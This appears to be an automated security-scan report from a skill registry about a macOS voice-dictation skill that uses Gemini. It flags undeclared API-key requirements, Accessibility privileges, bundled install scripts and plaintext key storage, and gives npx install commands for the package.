by 安全扫描
OpenClaw
可疑
medium confidenceNULL
评估建议
What to consider before installing:
- Metadata mismatch: the registry did not declare required environment variables, but SKILL.md requires a GEMINI API key (GEMINI_API_KEY or ~/.api-key). Expect to provide that key for the app to work.
- High‑privilege behavior: the app needs macOS Accessibility permissions (global key capture) and performs text injection (AXUIElement or simulated paste). Granting Accessibility lets the app observe/affect other apps — only proceed if you trust the source and c...详细分析 ▾
ℹ 用途与能力
The skill's description and SKILL.md match each other (a macOS app that captures a Globe key press, streams audio to Google Gemini, and injects text). However registry metadata lists no required environment variables while the SKILL.md explicitly requires a GEMINI_API_KEY (or .api-key file). That mismatch is an inconsistency the author should have declared in metadata but is otherwise consistent with the stated purpose.
⚠ 指令范围
Runtime instructions ask the user to grant Accessibility permissions (global event tap) and to add Terminal.app to Accessibility — both are required for global key capture and text injection but are high‑impact actions. The instructions also tell users to run install.sh / build.sh and to store an API key in ~/.api-key or an environment variable. The skill's behavior (AXUIElement / simulated paste or CGEvent injection) will write text into other apps and requires macOS privacy privileges; that is functionally coherent but broad in scope and warrants explicit user understanding and review.
ℹ 安装机制
There is no platform install spec in the registry (instruction-only), but the bundle includes install.sh, native/build.sh and uninstall.sh — i.e., install scripts that will run on the user's machine. The repo references official GitHub releases (not a random URL), which is preferable to arbitrary downloads, but any included shell scripts should be inspected before execution because they will write files and modify system state.
⚠ 凭证需求
Functionally the skill needs a Gemini API key, which the SKILL.md asks for; requesting GEMINI_API_KEY is proportionate to the stated cloud‑API purpose. But the registry metadata omits this requirement (declares no required env vars), creating an incoherence. The SKILL.md also suggests storing the key in a plaintext file (~/.api-key), which is a weaker storage approach; the code content notes earlier unsafe patterns (e.g., originally placing API key in URL query). These are security/operational concerns to address before use.
ℹ 持久化与权限
The skill does not request always:true and is user-invocable (normal). However, it requires macOS Accessibility (AX) privileges and can inject keystrokes / write into other applications — a high privilege for a skill. That privilege is consistent with a global hotkey + input-injection tool, but it increases risk: only install if you trust the code and the publisher.
安全有层次,运行前请审查代码。
运行时依赖
无特殊依赖
版本
latestv1.3.22026/3/25
NULL
● Pending
安装命令
点击复制官方npx clawhub@latest install xiabb
镜像加速npx clawhub@latest install xiabb --registry https://cn.longxiaskill.com镜像同步中